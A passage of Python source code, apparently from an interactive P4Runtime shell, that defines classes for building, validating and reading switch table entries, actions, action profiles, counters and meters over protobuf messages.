length = str(field_info.bitwidth)
prefix = bytes_utils.parse_value(prefix, field_info.bitwidth)
try:
length = int(length)
except ValueError:
raise UserError("'{}' is not a valid prefix length").format(length)
return self._sanitize_and_convert_mf_lpm(prefix, length, field_info)
def _sanitize_and_convert_mf_lpm(self, prefix, length, field_info):
if length == 0:
raise UserError(
"Ignoring LPM don't care match (prefix length of 0) as per P4Runtime spec")
mf = p4runtime_pb2.FieldMatch()
mf.field_id = field_info.id
mf.lpm.prefix_len = length
first_byte_masked = length // 8
if first_byte_masked == len(prefix):
mf.lpm.value = prefix
return mf
barray = bytearray(prefix)
transformed = False
r = length % 8
byte_mask = 0xff & ((0xff << (8 - r)))
if barray[first_byte_masked] & byte_mask != barray[first_byte_masked]:
transformed = True
barray[first_byte_masked] = barray[first_byte_masked] & byte_mask
for i in range(first_byte_masked + 1, len(prefix)):
if barray[i] != 0:
transformed = True
barray[i] = 0
if transformed:
print("LPM value was transformed to conform to the P4Runtime spec "
"(trailing bits must be unset)")
mf.lpm.value = bytes(bytes_utils.make_canonical_if_option_set(barray))
return mf
def _parse_mf_ternary(self, s, field_info):
try:
value, mask = s.split('&&&')
value, mask = value.strip(), mask.strip()
except ValueError:
value = s.strip()
mask = "0b" + ("1" * field_info.bitwidth)
value = bytes_utils.parse_value(value, field_info.bitwidth)
mask = bytes_utils.parse_value(mask, field_info.bitwidth)
return self._sanitize_and_convert_mf_ternary(value, mask, field_info)
def _sanitize_and_convert_mf_ternary(self, value, mask, field_info):
if int.from_bytes(mask, byteorder='big') == 0:
raise UserError("Ignoring ternary don't care match (mask of 0s) as per P4Runtime spec")
mf = p4runtime_pb2.FieldMatch()
mf.field_id = field_info.id
barray = bytearray(value)
transformed = False
for i in range(len(value)):
if barray[i] & mask[i] != barray[i]:
transformed = True
barray[i] = barray[i] & mask[i]
if transformed:
print("Ternary value was transformed to conform to the P4Runtime spec "
"(masked off bits must be unset)")
mf.ternary.value = bytes(bytes_utils.make_canonical_if_option_set(barray))
mf.ternary.mask = bytes_utils.make_canonical_if_option_set(mask)
return mf
def _parse_mf_range(self, s, field_info):
try:
start, end = s.split('..')
start, end = start.strip(), end.strip()
except ValueError:
raise UserError("'{}' does not specify a valid range, use '<start>..<end>'").format(
s)
start = bytes_utils.parse_value(start, field_info.bitwidth)
end = bytes_utils.parse_value(end, field_info.bitwidth)
return self._sanitize_and_convert_mf_range(start, end, field_info)
def _sanitize_and_convert_mf_range(self, start, end, field_info):
# It's a bit silly: the fields are converted from str to int to bytes by bytes_utils, then
# converted back to int here...
start_ = int.from_bytes(start, byteorder='big')
end_ = int.from_bytes(end, byteorder='big')
if start_ > end_:
raise UserError("Invalid range match: start is greater than end")
if start_ == 0 and end_ == ((1 << field_info.bitwidth) - 1):
raise UserError(
"Ignoring range don't care match (all possible values) as per P4Runtime spec")
mf = p4runtime_pb2.FieldMatch()
mf.field_id = field_info.id
mf.range.low = bytes_utils.make_canonical_if_option_set(start)
mf.range.high = bytes_utils.make_canonical_if_option_set(end)
return mf
def _add_field(self, field_info):
self._fields[field_info.name] = field_info
self._recompute_suffixes()
def _recompute_suffixes(self):
suffixes = {}
suffix_count = Counter()
for fname in self._fields:
suffix = None
for s in reversed(fname.split(".")):
suffix = s if suffix is None else s + "." + suffix
suffixes[suffix] = fname
suffix_count[suffix] += 1
for suffix, c in suffix_count.items():
if c > 1:
del suffixes[suffix]
self._fields_suffixes = suffixes
def __str__(self):
return '\n'.join([str(mf) for name, mf in self._mk.items()])
def _repr_pretty_(self, p, cycle):
for name, mf in self._mk.items():
p.text(str(mf))
def set(self, **kwargs):
for name, value in kwargs.items():
self[name] = value
def clear(self):
self._mk.clear()
def _count(self):
return len(self._mk)
class Action:
def __init__(self, action_name=None):
self._init = False
if action_name is None:
raise UserError("Please provide name for action")
self.action_name = action_name
action_info = context.get_action(action_name)
if action_info is None:
raise UserError("Unknown action '{}'".format(action_name))
self._action_id = action_info.preamble.id
self._params = OrderedDict()
for param in action_info.params:
self._params[param.name] = param
self._action_info = action_info
self._param_values = OrderedDict()
self._set_docstring()
self._init = True
def _set_docstring(self):
self.__doc__ = "Action parameters for action '{}':\n\n".format(self.action_name)
for name, info in self._params.items():
self.__doc__ += str(info)
self.__doc__ += "\n\n"
self.__doc__ += "Set a param value with <self>['<param_name>'] = '<value>'\n"
self.__doc__ += "You may also use <self>.set(<param_name>='<value>')\n"
def _ipython_key_completions_(self):
return self._params.keys()
def __dir__(self):
return ["action_name", "msg", "set"]
def _get_param(self, name):
if name not in self._params:
raise UserError(
"'{}' is not a valid action parameter name for action '{}'".format(
name, self._action_name))
return self._params[name]
def __setattr__(self, name, value):
if name[0] == "_" or not self._init:
super().__setattr__(name, value)
return
if name == "action_name":
raise UserError("Cannot change action name")
super().__setattr__(name, value)
def __setitem__(self, name, value):
param_info = self._get_param(name)
self._param_values[name] = self._parse_param(value, param_info)
print(self._param_values[name])
def __getitem__(self, name):
_ = self._get_param(name)
print(self._param_values.get(name, "Unset"))
def _parse_param(self, s, param_info):
if type(s) is not str:
raise UserError("Action parameter value must be a string")
v = bytes_utils.parse_value(s, param_info.bitwidth)
p = p4runtime_pb2.Action.Param()
p.param_id = param_info.id
p.value = bytes_utils.make_canonical_if_option_set(v)
return p
def msg(self):
msg = p4runtime_pb2.Action()
msg.action_id = self._action_id
msg.params.extend(self._param_values.values())
return msg
def _from_msg(self, msg):
assert(self._action_id == msg.action_id)
self._params.clear()
for p in msg.params:
p_name = context.get_param_name(self.action_name, p.param_id)
self._param_values[p_name] = p
def __str__(self):
return str(self.msg())
def _repr_pretty_(self, p, cycle):
p.text(str(self.msg()))
def set(self, **kwargs):
for name, value in kwargs.items():
self[name] = value
class _EntityBase:
def __init__(self, entity_type, p4runtime_cls, modify_only=False):
self._init = False
self._entity_type = entity_type
self._entry = p4runtime_cls()
self._modify_only = modify_only
def __dir__(self):
d = ["msg", "read"]
if self._modify_only:
d.append("modify")
else:
d.extend(["insert", "modify", "delete"])
return d
# to be called before issueing a P4Runtime request
# enforces checks that cannot be performed when setting individual fields
def _validate_msg(self):
return True
def _update_msg(self):
pass
def __str__(self):
self._update_msg()
return str(_repr_pretty_p4runtime(self._entry))
def _repr_pretty_(self, p, cycle):
self._update_msg()
p.text(_repr_pretty_p4runtime(self._entry))
def __getattr__(self, name):
raise AttributeError("'{}' object has no attribute '{}'".format(
self.__class__.__name__, name))
def msg(self):
self._update_msg()
return self._entry
def _write(self, type_):
self._update_msg()
self._validate_msg()
update = p4runtime_pb2.Update()
update.type = type_
getattr(update.entity, self._entity_type.name).CopyFrom(self._entry)
client.write_update(update)
def insert(self):
if self._modify_only:
raise NotImplementedError("Insert not supported for {}".format(self._entity_type.name))
logging.debug("Inserting entry")
self._write(p4runtime_pb2.Update.INSERT)
def delete(self):
if self._modify_only:
raise NotImplementedError("Delete not supported for {}".format(self._entity_type.name))
logging.debug("Deleting entry")
self._write(p4runtime_pb2.Update.DELETE)
def modify(self):
logging.debug("Modifying entry")
self._write(p4runtime_pb2.Update.MODIFY)
def _from_msg(self, msg):
raise NotImplementedError
def read(self, function=None):
# Entities should override this method and provide a helpful docstring
self._update_msg()
self._validate_msg()
entity = p4runtime_pb2.Entity()
getattr(entity, self._entity_type.name).CopyFrom(self._entry)
iterator = client.read_one(entity)
# Cannot use a (simpler) generator here as we need to decorate __next__ with
# @parse_p4runtime_error.
class _EntryIterator:
def __init__(self, entity, it):
self._entity = entity
self._it = it
self._entities_it = None
def __iter__(self):
return self
@parse_p4runtime_error
def __next__(self):
if self._entities_it is None:
rep = next(self._it)
self._entities_it = iter(rep.entities)
try:
entity = next(self._entities_it)
except StopIteration:
self._entities_it = None
return next(self)
if isinstance(self._entity, _P4EntityBase):
e = type(self._entity)(self._entity.name) # create new instance of same entity
else:
e = type(self._entity)()
msg = getattr(entity, self._entity._entity_type.name)
e._from_msg(msg)
# neither of these should be needed
# e._update_msg()
# e._entry.CopyFrom(msg)
return e
if function is None:
return _EntryIterator(self, iterator)
else:
for x in _EntryIterator(self, iterator):
function(x)
class _P4EntityBase(_EntityBase):
def __init__(self, p4_type, entity_type, p4runtime_cls, name=None, modify_only=False):
super().__init__(entity_type, p4runtime_cls, modify_only)
self._p4_type = p4_type
if name is None:
raise UserError("Please provide name for {}".format(p4_type.pretty_name))
self.name = name
self._info = P4Objects(p4_type)[name]
self.id = self._info.id
def __dir__(self):
return super().__dir__() + ["name", "id", "info"]
def info(self):
"""Display P4Info entry for the object"""
return self._info
class ActionProfileMember(_P4EntityBase):
def __init__(self, action_profile_name=None):
super().__init__(
P4Type.action_profile, P4RuntimeEntity.action_profile_member,
p4runtime_pb2.ActionProfileMember, action_profile_name)
self.member_id = 0
self.action = None
self._valid_action_ids = self._get_action_set()
self.__doc__ = """
An action profile member for '{}'
Use <self>.info to display the P4Info entry for the action profile.
Set the member id with <self>.member_id = <expr>.
To set the action specification <self>.action = <instance of type Action>.
To set the value of action parameters, use <self>.action['<param name>'] = <expr>.
Type <self>.action? for more details.
Typical usage to insert an action profile member:
m = action_profile_member['<action_profile_name>'](action='<action_name>', member_id=1)
m.action['<p1>'] = ...
...
m.action['<pM>'] = ...
# OR m.action.set(p1=..., ..., pM=...)
m.insert
For information about how to read members, use <self>.read?
""".format(action_profile_name)
self._init = True
def __dir__(self):
return super().__dir__() + ["member_id", "action"]
def _get_action_set(self):
t_id = self._info.table_ids[0]
t_name = context.get_name_from_id(t_id)
t = context.get_table(t_name)
return set([action.id for action in t.action_refs])
def __call__(self, **kwargs):
for name, value in kwargs.items():
if name == "action" and type(value) is str:
value = Action(value)
setattr(self, name, value)
return self
def __setattr__(self, name, value):
if name[0] == "_" or not self._init:
super().__setattr__(name, value)
return
if name == "name":
raise UserError("Cannot change action profile name")
if name == "member_id":
if type(value) is not int:
raise UserError("member_id must be an integer")
if name == "action" and value is not None:
if not isinstance(value, Action):
raise UserError("action must be an instance of Action")
if not self._is_valid_action_id(value._action_id):
raise UserError("action '{}' is not a valid action for this action profile".format(
value.action_name))
super().__setattr__(name, value)
def _is_valid_action_id(self, action_id):
return action_id in self._valid_action_ids
def _update_msg(self):
self._entry.action_profile_id = self.id
self._entry.member_id = self.member_id
if self.action is not None:
self._entry.action.CopyFrom(self.action.msg())
def _from_msg(self, msg):
self.member_id = msg.member_id
if msg.HasField('action'):
action = msg.action
action_name = context.get_name_from_id(action.action_id)
self.action = Action(action_name)
self.action._from_msg(action)
def read(self, function=None):
"""Generate a P4Runtime Read RPC. Supports wildcard reads (just leave
the appropriate fields unset).
If function is None, returns an iterator. Iterate over it to get all the
members (as ActionProfileMember instances) returned by the
server. Otherwise, function is applied to all the members returned
by the server.
"""
return super().read(function)
class GroupMember:
"""
A member in an ActionProfileGroup.
Construct with GroupMember(<member_id>, weight=<weight>, watch=<watch>,
watch_port=<watch_port>).
You can set / get attributes member_id (required), weight (default 1), watch (default 0),
watch_port (default "").
"""
def __init__(self, member_id=None, weight=1, watch=0, watch_port=b""):
if member_id is None:
raise UserError("member_id is required")
self._msg = p4runtime_pb2.ActionProfileGroup.Member()
self._msg.member_id = member_id
self._msg.weight = weight
if watch:
self._msg.watch = watch
if watch_port:
self._msg.watch_port = watch_port
def __dir__(self):
return ["member_id", "weight", "watch", "watch_port"]
def __setattr__(self, name, value):
if name[0] == "_":
super().__setattr__(name, value)
return
if name == "member_id":
if type(value) is not int:
raise UserError("member_id must be an integer")
self._msg.member_id = value
return
if name == "weight":
if type(value) is not int:
raise UserError("weight must be an integer")
self._msg.weight = value
return
if name == "watch":
if type(value) is not int:
raise UserError("watch must be an integer")
self._msg.watch = value
return
if name == "watch_port":
if type(value) is not bytes:
raise UserError("watch_port must be a byte string")
self._msg.watch_port = value
return
super().__setattr__(name, value)
def __getattr__(self, name):
if name == "member_id":
return self._msg.member_id
if name == "weight":
return self._msg.weight
if name == "watch":
return self._msg.watch
if name == "watch_port":
return self._msg.watch_port
return super().__getattr__(name)
def __str__(self):
return str(self._msg)
def _repr_pretty_(self, p, cycle):
p.text(str(p))
class ActionProfileGroup(_P4EntityBase):
def __init__(self, action_profile_name=None):
super().__init__(
P4Type.action_profile, P4RuntimeEntity.action_profile_group,
p4runtime_pb2.ActionProfileGroup, action_profile_name)
self.group_id = 0
self.max_size = 0
self.members = []
self.__doc__ = """
An action profile group for '{}'
Use <self>.info to display the P4Info entry for the action profile.
Set the group id with <self>.group_id = <expr>. Default is 0.
Set the max size with <self>.max_size = <expr>. Default is 0.
Add members to the group with <self>.add(<member_id>, weight=<weight>, watch=<watch>,
watch_port=<watch_port>).
weight, watch and watch port are optional (default to 1, 0 and "" respectively).
Typical usage to insert an action profile group:
g = action_profile_group['<action_profile_name>'](group_id=1)
g.add(<member id 1>)
g.add(<member id 2>)
# OR g.add(<member id 1>).add(<member id 2>)
For information about how to read groups, use <self>.read?
""".format(action_profile_name)
self._init = True
def __dir__(self):
return super().__dir__() + ["group_id", "max_size", "members", "add", "clear"]
def __call__(self, **kwargs):
for name, value in kwargs.items():
setattr(self, name, value)
return self
def __setattr__(self, name, value):
if name[0] == "_" or not self._init:
super().__setattr__(name, value)
return
if name == "name":
raise UserError("Cannot change action profile name")
elif name == "group_id":
if type(value) is not int:
raise UserError("group_id must be an integer")
elif name == "members":
if type(value) is not list:
raise UserError("members must be a list of GroupMember objects")
for m in value:
if type(m) is not GroupMember:
raise UserError("members must be a list of GroupMember objects")
super().__setattr__(name, value)
def add(self, member_id=None, weight=1, watch=0, watch_port=b""):
"""Add a member to the members list."""
self.members.append(GroupMember(member_id, weight, watch, watch_port))
return self
def clear(self):
"""Empty members list."""
self.members = []
def _update_msg(self):
self._entry.action_profile_id = self.id
self._entry.group_id = self.group_id
self._entry.max_size = self.max_size
del self._entry.members[:]
for member in self.members:
if type(member) is not GroupMember:
raise UserError("members must be a list of GroupMember objects")
m = self._entry.members.add()
m.CopyFrom(member._msg)
def _from_msg(self, msg):
self.group_id = msg.group_id
self.max_size = msg.max_size
self.members = []
for member in msg.members:
self.add(member.member_id, member.weight, member.watch, member.watch_port)
def read(self, function=None):
"""Generate a P4Runtime Read RPC. Supports wildcard reads (just leave
the appropriate fields unset).
If function is None, returns an iterator. Iterate over it to get all the
members (as ActionProfileGroup instances) returned by the
server. Otherwise, function is applied to all the groups returned by the
server.
"""
return super().read(function)
def _get_action_profile(table_name):
table = context.get_table(table_name)
implementation_id = table.implementation_id
if implementation_id == 0:
return None
try:
implementation_name = context.get_name_from_id(implementation_id)
except KeyError:
raise InvalidP4InfoError(
"Invalid implementation_id {} for table '{}'".format(
implementation_id, table_name))
ap = context.get_obj(P4Type.action_profile, implementation_name)
if ap is None:
raise InvalidP4InfoError("Unknown implementation for table '{}'".format(table_name))
return ap
class OneshotAction:
"""
An action in a oneshot action set.
Construct with OneshotAction(<action (Action instance)>, weight=<weight>, watch=<watch>,
watch_port=<watch_port>).
You can set / get attributes action (required), weight (default 1), watch (default 0),
watch_port (default "").
"""
def __init__(self, action=None, weight=1, watch=0, watch_port=b""):
if action is None:
raise UserError("action is required")
self.action = action
self.weight = weight
self.watch = watch
self.watch_port = watch_port
def __dir__(self):
return ["action", "weight", "watch", "watch_port", "msg"]
def __setattr__(self, name, value):
if name[0] == "_":
super().__setattr__(name, value)
return
if name == "action":
if not isinstance(value, Action):
raise UserError("action must be an instance of Action")
elif name == "weight":
if type(value) is not int:
raise UserError("weight must be an integer")
elif name == "watch":
if type(value) is not int:
raise UserError("watch must be an integer")
elif name == "watch_port":
print(type(value), value)
if type(value) is not bytes:
raise UserError("watch_port must be a byte string")
super().__setattr__(name, value)
def msg(self):
msg = p4runtime_pb2.ActionProfileAction()
msg.action.CopyFrom(self.action.msg())
msg.weight = self.weight
if self.watch:
msg.watch = self.watch
if self.watch_port:
msg.watch_port = self.watch_port
return msg
def __str__(self):
return str(self.msg())
def _repr_pretty_(self, p, cycle):
p.text(str(self.msg()))
class Oneshot:
def __init__(self, table_name=None):
self._init = False
if table_name is None:
raise UserError("Please provide table name")
self.table_name = table_name
self.actions = []
self._table_info = P4Objects(P4Type.table)[table_name]
ap = _get_action_profile(table_name)
if not ap:
raise UserError("Cannot create Oneshot instance for a direct table")
if not ap.with_selector:
raise UserError(
"Cannot create Oneshot instance for a table with an action profile "
"without selector")
self.__doc__ = """
A "oneshot" action set for table '{}'.
To add an action to the set, use <self>.add(<Action instance>).
You can also access the set of actions with <self>.actions (which is a Python list).
""".format(self.table_name)
self._init = True
def __dir__(self):
return ["table_name", "actions", "add", "msg"]
def __setattr__(self, name, value):
if name[0] == "_" or not self._init:
super().__setattr__(name, value)
return
if name == "table_name":
raise UserError("Cannot change table name")
elif name == "actions":
if type(value) is not list:
raise UserError("actions must be a list of OneshotAction objects")
for m in value:
if type(m) is not OneshotAction:
raise UserError("actions must be a list of OneshotAction objects")
if not self._is_valid_action_id(value.action._action_id):
raise UserError("action '{}' is not a valid action for table {}".format(
value.action.action_name, self.table_name))
super().__setattr__(name, value)
def _is_valid_action_id(self, action_id):
for action_ref in self._table_info.action_refs:
if action_id == action_ref.id:
return True
return False
def add(self, action=None, weight=1, watch=0, watch_port=b""):
"""Add an action to the oneshot action set."""
self.actions.append(OneshotAction(action, weight, watch, watch_port))
return self
def msg(self):
msg = p4runtime_pb2.ActionProfileActionSet()
msg.action_profile_actions.extend([action.msg() for action in self.actions])
return msg
def _from_msg(self, msg):
for action in msg.action_profile_actions:
action_name = context.get_name_from_id(action.action.action_id)
a = Action(action_name)
a._from_msg(action.action)
self.actions.append(OneshotAction(a, action.weight, action.watch, action.watch_port))
def __str__(self):
return str(self.msg())
def _repr_pretty_(self, p, cycle):
p.text(str(self.msg()))
class _CounterData:
@staticmethod
def attrs_for_counter_type(counter_type):
attrs = []
if counter_type in {p4info_pb2.CounterSpec.BYTES, p4info_pb2.CounterSpec.BOTH}:
attrs.append("byte_count")
if counter_type in {p4info_pb2.CounterSpec.PACKETS, p4info_pb2.CounterSpec.BOTH}:
attrs.append("packet_count")
return attrs
def __init__(self, counter_name, counter_type):
self._counter_name = counter_name
self._counter_type = counter_type
self._msg = p4runtime_pb2.CounterData()
self._attrs = _CounterData.attrs_for_counter_type(counter_type)
def __dir__(self):
return self._attrs
def __setattr__(self, name, value):
if name[0] == "_":
super().__setattr__(name, value)
return
if name not in self._attrs:
type_name = p4info_pb2._COUNTERSPEC_UNIT.values_by_number[self._counter_type].name
raise UserError("Counter '{}' is of type '{}', you cannot set '{}'".format(
self._counter_name, type_name, name))
if type(value) is not int:
raise UserError("{} must be an integer".format(name))
setattr(self._msg, name, value)
def __getattr__(self, name):
if name == "byte_count" or name == "packet_count":
return getattr(self._msg, name)
raise AttributeError("'{}' object has no attribute '{}'".format(
self.__class__.__name__, name))
def msg(self):
return self._msg
def _from_msg(self, msg):
self._msg.CopyFrom(msg)
def __str__(self):
return str(self.msg())
def _repr_pretty_(self, p, cycle):
p.text(str(self.msg()))
@classmethod
def set_count(cls, instance, counter_name, counter_type, name, value):
if instance is None:
d = cls(counter_name, counter_type)
else:
d = instance
setattr(d, name, value)
return d
@classmethod
def get_count(cls, instance, counter_name, counter_type, name):
if instance is None:
d = cls(counter_name, counter_type)
else:
d = instance
r = getattr(d, name)
return d, r
class _MeterConfig:
@staticmethod
def attrs():
return ["cir", "cburst", "pir", "pburst"]
def __init__(self, meter_name, meter_type):
self._meter_name = meter_name
self._meter_type = meter_type
self._msg = p4runtime_pb2.MeterConfig()
self._attrs = _MeterConfig.attrs()
def __dir__(self):
return self._attrs
def __setattr__(self, name, value):
if name[0] == "_":
super().__setattr__(name, value)
return
if name in self._attrs:
if type(value) is not int:
raise UserError("{} must be an integer".format(name))
setattr(self._msg, name, value)
def __getattr__(self, name):
if name in self._attrs:
return getattr(self._msg, name)
raise AttributeError("'{}' object has no attribute '{}'".format(
self.__class__.__name__, name))
def msg(self):
return self._msg
def _from_msg(self, msg):
self._msg.CopyFrom(msg)
def __str__(self):
return str(self.msg())
def _repr_pretty_(self, p, cycle):
p.text(str(self.msg()))
@classmethod
def set_param(cls, instance, meter_name, meter_type, name, value):
if instance is None:
d = cls(meter_name, meter_type)
else:
d = instance
setattr(d, name, value)
return d
@classmethod
def get_param(cls, instance, meter_name, meter_type, name):
if instance is None:
d = cls(meter_name, meter_type)
else:
d = instance
r = getattr(d, name)
return d, r
class TableEntry(_P4EntityBase):
@enum.unique
class _ActionSpecType(enum.Enum):
NONE = 0
DIRECT_ACTION = 1
MEMBER_ID = 2
GROUP_ID = 3
ONESHOT = 4
@classmethod
def _action_spec_name_to_type(cls, name):
return {
"action": cls._ActionSpecType.DIRECT_ACTION,
"member_id": cls._ActionSpecType.MEMBER_ID,
"group_id": cls._ActionSpecType.GROUP_ID,
"oneshot": cls._ActionSpecType.ONESHOT,
}.get(name, None)
def __init__(self, table_name=None):
super().__init__(
P4Type.table, P4RuntimeEntity.table_entry,
p4runtime_pb2.TableEntry, table_name)
self.match = MatchKey(table_name, self._info.match_fields)
self._action_spec_type = self._ActionSpecType.NONE
self._action_spec = None
self.priority = 0
self.is_default = False
ap = _get_action_profile(table_name)
if ap is None:
self._support_members = False
self._support_groups = False
else:
self._support_members = True
self._support_groups = ap.with_selector
self._direct_counter = None
self._direct_meter = None
for res_id in self._info.direct_resource_ids:
prefix = (res_id & 0xff000000) >> 24
if prefix == p4info_pb2.P4Ids.DIRECT_COUNTER:
self._direct_counter = context.get_obj_by_id(res_id)
elif prefix == p4info_pb2.P4Ids.DIRECT_METER:
self._direct_meter = context.get_obj_by_id(res_id)
self._counter_data = None
self._meter_config = None
self.metadata = b""
self.__doc__ = """
An entry for table '{}'
Use <self>.info to display the P4Info entry for this table.
To set the match key, use <self>.match['<field name>'] = <expr>.
Type <self>.match? for more details.
""".format(table_name)
if self._direct_counter is not None:
self.__doc__ += """
To set the counter spec, use <self>.counter_data.byte_count and/or <self>.counter_data.packet_count.
To unset it, use <self>.counter_data = None or <self>.clear_counter_data().
"""
if self._direct_meter is not None:
self.__doc__ += """
To access the meter config, use <self>.meter_config.<cir|cburst|pir|pburst>.
To unset it, use <self>.meter_config = None or <self>.clear_meter_config().
"""
if ap is None:
self.__doc__ += """
To set the action specification (this is a direct table):
<self>.action = <instance of type Action>.
To set the value of action parameters, use <self>.action['<param name>'] = <expr>.
Type <self>.action? for more details.
"""
if self._support_members:
self.__doc__ += """
Access the member_id with <self>.member_id.
"""
if self._support_groups:
self.__doc__ += """
Or access the group_id with <self>.group_id.
"""
self.__doc__ += """
To set the priority, use <self>.priority = <expr>.
To mark the entry as default, use <self>.is_default = True.
To add metadata to the entry, use <self>.metadata = <expr>.
"""
if ap is None:
self.__doc__ += """
Typical usage to insert a table entry:
t = table_entry['<table_name>'](action='<action_name>')
t.match['<f1>'] = ...
...
t.match['<fN>'] = ...
# OR t.match.set(f1=..., ..., fN=...)
t.action['<p1>'] = ...
...
t.action['<pM>'] = ...
# OR t.action.set(p1=..., ..., pM=...)
t.insert
Typical usage to set the default entry:
t = table_entry['<table_name>'](is_default=True)
t.action['<p1>'] = ...
...
t.action['<pM>'] = ...
# OR t.action.set(p1=..., ..., pM=...)
t.modify
"""
else:
self.__doc__ += """
Typical usage to insert a table entry:
t = table_entry['<table_name>']
t.match['<f1>'] = ...
...
t.match['<fN>'] = ...
# OR t.match.set(f1=..., ..., fN=...)
t.member_id = <expr>
"""
self.__doc__ += """
For information about how to read table entries, use <self>.read?
"""
self._init = True
def __dir__(self):
d = super().__dir__() + [
"match", "priority", "is_default", "metadata",
"clear_action", "clear_match", "clear_counter_data", "clear_meter_config"]
if self._support_groups:
d.extend(["member_id", "group_id", "oneshot"])
elif self._support_members:
d.append("member_id")
else:
d.append("action")
if self._direct_counter is not None:
d.append("counter_data")
if self._direct_meter is not None:
d.append("meter_config")
return d
def __call__(self, **kwargs):
for name, value in kwargs.items():
if name == "action" and type(value) is str:
value = Action(value)
setattr(self, name, value)
return self
def _action_spec_set_member(self, member_id):
if type(member_id) is None:
if self._action_spec_type == self._ActionSpecType.MEMBER_ID:
super().__setattr__("_action_spec_type", self._ActionSpecType.NONE)
super().__setattr__("_action_spec", None)
return
if type(member_id) is not int:
raise UserError("member_id must be an integer")
if not self._support_members:
raise UserError(
"Table does not have an action profile and therefore does not support members")
super().__setattr__("_action_spec_type", self._ActionSpecType.MEMBER_ID)
super().__setattr__("_action_spec", member_id)
def _action_spec_set_group(self, group_id):
if type(group_id) is None:
if self._action_spec_type == self._ActionSpecType.GROUP_ID:
super().__setattr__("_action_spec_type", self._ActionSpecType.NONE)
super().__setattr__("_action_spec", None)
return
if type(group_id) is not int:
raise UserError("group_id must be an integer")
if not self._support_groups:
raise UserError(
"Table does not have an action profile with selector "
"and therefore does not support groups")
super().__setattr__("_action_spec_type", self._ActionSpecType.GROUP_ID)
super().__setattr__("_action_spec", group_id)
def _action_spec_set_action(self, action):
if type(action) is None:
if self._action_spec_type == self._ActionSpecType.DIRECT_ACTION:
super().__setattr__("_action_spec_type", self._ActionSpecType.NONE)
super().__setattr__("_action_spec", None)
return
if not isinstance(action, Action):
raise UserError("action must be an instance of Action")
if self._info.implementation_id != 0:
raise UserError(
"Table has an implementation and therefore does not support direct actions "
"(P4Runtime 1.0 doesn't support writing the default action for indirect tables")
if not self._is_valid_action_id(action._action_id):
raise UserError("action '{}' is not a valid action for this table".format(
action.action_name))
super().__setattr__("_action_spec_type", self._ActionSpecType.DIRECT_ACTION)
super().__setattr__("_action_spec", action)
def _action_spec_set_oneshot(self, oneshot):
if type(oneshot) is None:
if self._action_spec_type == self._ActionSpecType.ONESHOT:
super().__setattr__("_action_spec_type", self._ActionSpecType.NONE)
super().__setattr__("_action_spec", None)
return
if not isinstance(oneshot, Oneshot):
raise UserError("oneshot must be an instance of Oneshot")
if not self._support_groups:
raise UserError(
"Table does not have an action profile with selector "
"and therefore does not support oneshot programming")
if self.name != oneshot.table_name:
raise UserError("This Oneshot instance was not created for this table")
super().__setattr__("_action_spec_type", self._ActionSpecType.ONESHOT)
super().__setattr__("_action_spec", oneshot)
def __setattr__(self, name, value):
if name[0] == "_" or not self._init:
super().__setattr__(name, value)
return
elif name == "name":
raise UserError("Cannot change table name")
elif name == "priority":
if type(value) is not int:
raise UserError("priority must be an integer")
elif name == "match" and not isinstance(value, MatchKey):
raise UserError("match must be an instance of MatchKey")
elif name == "is_default":
if type(value) is not bool:
raise UserError("is_default must be a boolean")
# TODO(antonin): should we do a better job and handle other cases (a field is set while
# is_default is set to True)?
if value is True and self.match._count() > 0:
print("Clearing match key because entry is now default")
self.match.clear()
elif name == "member_id":
self._action_spec_set_member(value)
return
elif name == "group_id":
self._action_spec_set_group(value)
return
elif name == "oneshot":
self._action_spec_set_oneshot(value)
elif name == "action" and value is not None:
self._action_spec_set_action(value)
return
elif name == "counter_data":
if self._direct_counter is None:
raise UserError("Table has no direct counter")
if value is None:
self._counter_data = None
return
raise UserError("Cannot set 'counter_data' directly")
elif name == "meter_config":
if self._direct_meter is None:
raise UserError("Table has no direct meter")
if value is None:
self._meter_config = None
return
raise UserError("Cannot set 'meter_config' directly")
elif name == "metadata":
if type(value) is not bytes:
raise UserError("metadata must be a byte string")
super().__setattr__(name, value)
def __getattr__(self, name):
if name == "counter_data":
if self._direct_counter is None:
raise UserError("Table has no direct counter")
if self._counter_data is None:
self._counter_data = _CounterData(
self._direct_counter.preamble.name, self._direct_counter.spec.unit)
return self._counter_data
if name == "meter_config":
if self._direct_meter is None:
raise UserError("Table has no direct meter")
if self._meter_config is None:
self._meter_config = _MeterConfig(
self._direct_meter.preamble.name, self._direct_meter.spec.unit)
return self._meter_config
t = self._action_spec_name_to_type(name)
if t is None:
return super().__getattr__(name)
if self._action_spec_type == t:
return self._action_spec
if t == self._ActionSpecType.ONESHOT:
self._action_spec_type = self._ActionSpecType.ONESHOT
self._action_spec = Oneshot(self.name)
return self._action_spec
return None
def _is_valid_action_id(self, action_id):
for action_ref in self._info.action_refs:
if action_id == action_ref.id:
return True
return False
def _from_msg(self, msg):
self.priority = msg.priority
self.is_default = msg.is_default_action
self.metadata = msg.metadata
for mf in msg.match:
mf_name = context.get_mf_name(self.name, mf.field_id)
self.match._mk[mf_name] = mf
if msg.action.HasField('action'):
action = msg.action.action
action_name = context.get_name_from_id(action.action_id)
self.action = Action(action_name)
self.action._from_msg(action)
elif msg.action.HasField('action_profile_member_id'):
self.member_id = msg.action.action_profile_member_id
elif msg.action.HasField('action_profile_group_id'):
self.group_id = msg.action.action_profile_group_id
elif msg.action.HasField('action_profile_action_set'):
self.oneshot = Oneshot(self.name)
self.oneshot._from_msg(msg.action.action_profile_action_set)
if msg.HasField('counter_data'):
self._counter_data = _CounterData(
self._direct_counter.preamble.name, self._direct_counter.spec.unit)
self._counter_data._from_msg(msg.counter_data)
else:
self._counter_data = None
if msg.HasField('meter_config'):
self._meter_config = _MeterConfig(
self._direct_meter.preamble.name, self._direct_meter.spec.unit)
self._meter_config._from_msg(msg.meter_config)
else:
self._meter_config = None
def read(self, function=None):
"""Generate a P4Runtime Read RPC. Supports wildcard reads (just leave
the appropriate fields unset).
If function is None, returns an iterator. Iterate over it to get all the
table entries (TableEntry instances) returned by the server. Otherwise,
function is applied to all the table entries returned by the server.
For example:
for te in <self>.read():
print(te)
The above code is equivalent to the following one-liner:
<self>.read(lambda te: print(te))
To delete all the entries from a table, simply use:
table_entry['<table_name>'].read(function=lambda x: x.delete())
"""
return super().read(function)
def _update_msg(self):
entry = p4runtime_pb2.TableEntry()
entry.table_id = self.id
entry.match.extend(self.match._mk.values())
entry.priority = self.priority
entry.is_default_action = self.is_default
entry.metadata = self.metadata
if self._action_spec_type == self._ActionSpecType.DIRECT_ACTION:
